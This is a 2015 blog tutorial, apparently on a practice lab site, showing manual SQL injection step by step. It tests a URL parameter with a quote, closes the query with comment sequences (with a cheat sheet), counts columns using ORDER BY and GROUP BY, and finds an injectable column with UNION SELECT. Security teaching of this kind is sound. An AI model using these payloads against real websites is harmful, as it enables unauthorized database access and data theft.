Sunday, May 3, 2015

How to Find Number of Columns In a Vulnerable site Using Order By | Group By Part 2


Today  We  will learn How to Find Number of columns of site and also find which column is vulnerable

Lets Start :::

This is site which is vulnerable :::

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
First  we put a Single Code ' To check either it  is vulnerable or not....

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' 

IF it Generates A error Message like That You have SQL syntax Error....It means it is Vulnerable and suitable for SQL injection .....
SO in my case it Generates Error Message :::
As u can See in Picture













------------------------------------------------------------------------------------------------------------------------
~~~Fixing And Balancing A Query:::---- 
------------------------------------------------------------------------------------------------------------------------------

Fixing a query plays a very important role in sql injection. without fixing error we can not find number of columns  and Database informations.
We can fixe A Query by Using Comments like that :

 http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'  --+

if by Adding --+  error Goes it means our Query is fixed .now WE can use Order by  Or group by to find Number of columns and Perform other Tasks...

Some Cheat  sheet of Fixing A query .::


--:MySQL Linux Style
--+:MySQL Windows Style
#:Hash (URL encode while use)
--+-:SQL Comment
;:Null Byte
`:Backtick
Remember whenever the input is enclosed with single quotes only single quote with input will create error.When input is enlcosed by double quotes a double qoute with input will give error.When Input is not enlcosed with anything single quote and double quote both will give error.
--------------------------------------------------------------------------------------------------------------------------
so in my case it is fixed by using --+ ..


http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' --+
As you can see in this picutre Error Gone.  Now we can use order by or Group by to find number of columns

fixing a query



In Some cases it is not fix by using --+ then we use Null byte ;  or backtick and # .....
In Some CAses we have to remove single code ' and then we put at the end  -- only

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 --
----------------------------------------------------------------------------------------------------------------------
Finding Number of columns
--------------------------------------------------------------------------------------------
Ater fixing the query now going to find number of columns::
Now i am going to ask database that have you 1 column like that ::


http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+
Basics of sql


If it do not Generate Error Message it means it has one column.

 Now  I am going to ask again have you 2 columns from database..


http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 2--+

It does not generate  error
 

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+

no Error ::
    http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 4--+

Now This time It Gives me A error like that ::

Error While Selection process : Unknown column '4' in 'order clause'
sql basics
 So it means It has 3 columns Because at order by 4 it is telling us that 4 is unknown.....
----------------------------------------------------------------------------------------------------------------------

~~PerForMing Same Process With Group by::--
-----------------------------------------------------------------------------------------------------------------------------------------
My favourite is Group by ....

In Group by we can use Mulitple Integers At once like that 



 http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' group by 1--+
No Error ::
  

             http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' group by 1,2,3--+

no Error ::


http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' group by 1,2,3,4,5,6,7,8,9--+

But this Time It Generates error ::
Error While Selection process : Unknown column '4' in 'group statement' 

group by


It also telling us that it has 3 columns :::
--------------------------------------------------------------------------------------------------------------------

How To Find Vulnerable Columns::
-------------------------------------------------

Rules ::
By using Union Select
By Nullifying Parameters


-------------------------------------------
As we know it has 3 columns...now going to find which column is vulnerable..

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+


union select














As you can see in this picutre after nullify the parameter it is showing us 2 ..It means From  1,2,3 ...2 is vulnerable column where we can put our injection and extract some juicy data...
--------------------------------------------------------------------------------------------------------------------

In Next Tutorial We will learn How To Print Name , database , version , user, port ,tables and columns

Author ::(AFghani)

No comments:

Post a Comment